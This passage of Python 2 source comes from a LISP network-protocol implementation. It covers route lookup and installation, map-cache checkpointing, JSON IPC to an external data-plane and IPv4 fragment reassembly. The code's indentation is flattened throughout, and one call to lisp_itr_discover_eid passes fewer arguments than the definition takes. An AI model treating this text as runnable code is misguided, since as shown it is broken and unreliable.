if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
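#
# Example return value for illustration, assuming two IPv4 default routes
# (device names and next-hop addresses are hypothetical):
#
#   [["eth0", "192.168.1.1"], ["eth1", "10.0.0.1"]]
#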
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
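#
# For illustration (addresses are hypothetical):
# lisp_install_host_route("10.1.1.1", "192.168.1.1", True) runs
# "ip route add 10.1.1.1/32 via 192.168.1.1", and
# lisp_install_host_route("10.1.1.1", None, False) runs
# "ip route delete 10.1.1.1/32".
#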
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
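#
# For illustration (key strings are hypothetical), lisp_build_json_keys(
# {"rloc" : "10.0.0.2"}, "aa..", "bb..", "encrypt-key") returns:
#
#   { "rloc" : "10.0.0.2",
#     "keys" : [ { "key-id" : "1", "encrypt-key" : "aa..",
#                  "icv-key" : "bb.." } ] }
#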
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mapping records to the
# ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write records in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr process, write interface records to the ipc-data-plane
# socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
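#
# Worked examples for illustration (passwords are hypothetical):
#
#   lisp_parse_auth_key("secret") returns {0: "secret"}
#   lisp_parse_auth_key("[1]foo[2]bar") returns {1: "foo", 2: "bar"}
#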
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
    # Initialize list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
    # Do not queue fragment if first fragment arrived and we determined it's
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
        # so we don't do a full table traversal. But this only happens rarely.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
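#
# For illustration (addresses and port are hypothetical): on an RTR, an ETR
# RLOC 10.0.0.2 found in the NAT state cache yields "10.0.0.2:31247", while
# an xTR with a public RLOC yields just "10.0.0.2".
#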
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
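#
# For reference: 0x12 is a LISP header first-byte with type 1 (Map-Request)
# and the probe-bit set, and 0x28 is type 2 (Map-Reply) with the probe-bit
# set, which is what the two functions above test for.
#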
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
    # Process restart message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
        eid_string, input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
